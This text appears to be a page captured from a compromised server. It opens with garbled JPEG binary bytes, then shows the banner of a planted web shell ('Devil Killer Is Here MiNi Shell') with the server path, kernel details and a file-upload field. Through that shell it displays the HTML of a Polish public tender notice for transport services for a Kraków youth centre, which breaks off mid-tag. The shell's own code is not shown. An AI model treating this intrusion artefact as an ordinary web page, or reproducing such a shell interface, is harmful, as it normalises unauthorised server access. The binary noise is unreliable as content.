JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240118/0004857101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług transportu dla Centrum Młodzieży im. dr. H. Jordana w Krakowie w 2024 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Kraków - Centrum Młodzieży im. dr. H. Jordana z siedzibą w Krakowie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Centrum Młodzieży im. dr. H. Jordana z siedzibą w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000191916</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krupnicza 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-123</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 422 44 42</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@cmjordan.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.cmjordan.krakow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług transportu dla Centrum Młodzieży im. dr. H. Jordana w Krakowie w 2024 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4e4b0715-b5d7-11ee-b628-1a85378e6c0a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00048571</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00045971/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług transportu dla Centrum Młodzieży im. dr. H. Jordana w Krakowie w 2024 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-4e4b0715-b5d7-11ee-b628-1a85378e6c0a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a wykonawcami odbywa się przy użyciu: Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>3.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>4.Dokumenty elektroniczne , o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i<br/>przekazuje się jako załączniki.<br/>5.Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W<br/>przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym,<br/>mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu<br/>udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny,<br/>wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>6.W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>7.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@cmjordan.krakow.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Klauzule informacyjne z art. 13 i 14 RODO ujęte są w załącznikach nr 5A i nr 5B do swz.<br/>2.	Zamawiający wymaga złożenia przez Wykonawcę wraz z ofertą oświadczenia o wypełnieniu obowiązków informacyjnych, przewidzianych w art. 13 oraz jeśli dotyczy art. 14 RODO – oświadczenie jest ujęte w Formularzu oferty nr 5A i nr 5B.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.	Klauzule informacyjne z art. 13 i 14 RODO ujęte są w załącznikach nr 5A i nr 5B do swz.<br/>2.	Zamawiający wymaga złożenia przez Wykonawcę wraz z ofertą oświadczenia o wypełnieniu obowiązków informacyjnych, przewidzianych w art. 13 oraz jeśli dotyczy art. 14 RODO – oświadczenie jest ujęte w Formularzu oferty nr 5A i nr 5B.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CM/271/1/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 613146 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przewóz osób na trasie Kraków - Gołkowice Górne (poniedziałek, czasem termin wyjazdu może się różnić) i przewóz na trasie Gołkowice Górne - Kraków (piątek, czasem termin powrotny może się różnić). W każdym przypadku usługa polega na zawiezieniu osób oraz przywiezieniu osób - autobusy, kierowcy nie zostają na miejscu.<br/><br/>a) Wycena obejmuje przewóz tzw. autobusem małym - 20-22 osób<br/>b) Maksymalna liczba wyjazdów – 80 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 84592 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II zamówienia: <br/>2.Przewóz osób na trasie Kraków - Gołkowice Górne (poniedziałek, , czasem termin wyjazdu może się różnić) i przewóz na trasie Gołkowice Górne - Kraków (piątek, czasem termin powrotny może się różnić). W każdym przypadku usługa polega na zawiezieniu osób oraz przywiezieniu osób - autobusy, kierowcy nie zostają na miejscu.<br/>a) Wycena obejmuje przewóz tzw. autobusem średnim - 30-32 osób<br/>b) Maksymalna liczba wyjazdów – 70 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 105000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III zamówienia: <br/>3.Przewóz osób na trasie Kraków - Gołkowice Górne (poniedziałek, , czasem termin wyjazdu może się różnić) i przewóz na trasie Gołkowice Górne - Kraków (piątek, czasem termin powrotny może się różnić). W każdym przypadku usługa polega na zawiezieniu osób oraz przywiezieniu osób - autobusy, kierowcy nie zostają na miejscu.<br/><br/>a) Wycena obejmuje przewóz tzw. autobusem dużym – min.50 osób<br/>b) Maksymalna liczba wyjazdów – 60 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 137777 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Ocena ofert w kryterium „Cena wykonania zamówienia” zostanie dokonana według wzoru:<br/>Cena=(Najniższa cena wykonania zamówienia @spośród ofert niepodlegających odrzuceniu)/(Cena wykonania zamówienia oferty ocenianej) x 60 pkt<br/><br/>Ocena ofert w kryterium „Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii ” zostanie dokonana zgodnie z zasadą: <br/> Jeśli wykonawca zaoferuje dostarczenie zamiennego środku transportu do :<br/><br/>	3 godzin od zgłoszenia awarii – oferta otrzyma 00,00 pkt,<br/>	do 2 godzin od zgłoszenia awarii – oferta otrzyma 40,00 pkt,<br/>	<br/>Niepodanie przez Wykonawcę w formularzu oferty Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii, spowoduje, iż Zamawiający przyjmie, że Wykonawca Deklaruje 3 godziny na podstawienie autobusu od zgłoszenia awarii i jego oferta w tym kryterium otrzyma 0 pkt. <br/><br/>Obliczenia punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>Jako najkorzystniejsza zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej wymienionych kryteriach oceny ofert.<br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje Deklarowany w godzinach termin na podstawienie dodatkowego autobusu dla każdej z części zamówienia. <br/>Punktacja określona w pkt. 2 dotyczy, każdej części zamówienia. Wykonawca na Formularzu ofertowym podaje maksymalną cenę brutto dla każdej z części zamówienia oraz koszt pojedynczej usługi dla części I,II,III,IV,V. <br/>W przypadku części nr VI Wykonawca podaje cenę ryczałtową za wykonanie całości zamówienia określonego w pkt 6 Opisu Przedmiotu Zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Deklarowany w godzinach termin na podstawienie dodatkowego autobusu od zgłoszenia, awarii</span></h3> <h3 